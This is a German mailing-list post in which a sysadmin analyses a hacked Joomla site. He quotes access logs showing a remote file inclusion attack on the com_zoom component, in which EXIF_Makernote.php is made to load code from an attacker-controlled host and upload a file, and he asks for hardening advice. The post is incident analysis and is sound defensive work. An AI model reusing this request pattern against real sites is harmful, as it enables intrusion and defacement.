[Postfixbuch-users] OT Site gehackt

Uwe Driessen driessen at fblan.de
Mi Nov 28 15:11:51 CET 2007 

Crandler schrieb: 
> Hallo Uwe!
> 
> Das riecht nach langweiliger Code Injection per php. "com_zoom" dürfte Teil
> von Mambo/Joomla sein. Such doch mal die Logs ab - evtl. wirst du fündig.
> 
> Code Injection ist dir ein Begriff?

Jap ich habe auch gerade mal 10 MB Logfiles durchgeschaut von dem Fremden Server bzw.
dieser Site.


Ist richtig gehört zur Zoomgalery von Joomla 

In den Logs habe ich folgendes gefunden 

Hier war diese Datei gelöscht
201.86.233.130 - - [27/Nov/2007:19:39:19 +0100] "GET /components/com_zoom/link.php
HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Hier wird sie wieder eingeschleust

201.19.118.75 - - [27/Nov/2007:19:39:26 +0100] "POST
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://snob.n
o-ip.info/cmd?&action=upload&chdir=/var/www/web396/html/bavaria/bavaria/components/com_zoo
m/ HTTP/1.1" 200 32656
"http://www.bavaria-ebernburg.de/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosCo
nfig_absolute_path=http://snob.no-ip.info/cmd?&chdir=/var/www/web396/html/bavaria/bavaria/
components/com_zoom/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.9)
Gecko/20071025 Firefox/2.0.0.9"


201.19.118.75 - - [27/Nov/2007:19:39:26 +0100] "POST
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://snob.n
o-ip.info/cmd?&action=upload&chdir=/var/www/web396/html/bavaria/bavaria/components/com_zoo
m/ HTTP/1.1" 200 32656
"http://www.bavaria-ebernburg.de/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosCo
nfig_absolute_path=http://snob.no-ip.info/cmd?&chdir=/var/www/web396/html/bavaria/bavaria/
components/com_zoom/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.9)
Gecko/20071025 Firefox/2.0.0.9"

Hier steht Sie wieder zur Verfügung 

201.15.253.165 - - [27/Nov/2007:19:39:30 +0100] "GET /components/com_zoom/link.php
HTTP/1.1" 200 120027
"http://webmail.vidyayoga.org/cgi-bin/webmail/webmail-read.pl?acao=readmessage&folder=inbo
x&firstmessage=1&sessionid=TwvOBPV1v1Bsz94KKXolo1om25I0BIaM&sort=date&headers=normal&messa
ge_id=cur/1196167307.10653.hm191,S=3415" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X;
pt-pt) AppleWebKit/417.10 (KHTML, like Gecko) Safari/417.9"

Ich hoffe mal das mein Server mit 

PHP 5.2.3-1+lenny1 (cli) (built: Oct  3 2007 19:22:40)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies

Erstmal sicher ist konnte bis dato in den eigenen Logs auch noch keine Aufrufe dieser Art
finden.

Noch jemand Tips damit es gar nicht erst passiert? 
Der die Seite geschrieben bzw. eingerichtet hat ist verständigt um evtl. Updates
einzuspielen.


> 
> Gruß Sven
> 


Mit freundlichen Grüßen

Drießen

-- 
Software & Computer
Uwe Drießen
Lembergstraße 33
67824 Feilbingert
Tel.: 06708 / 660045   Fax: 06708 / 661397

Mehr Informationen über die Mailingliste Postfixbuch-users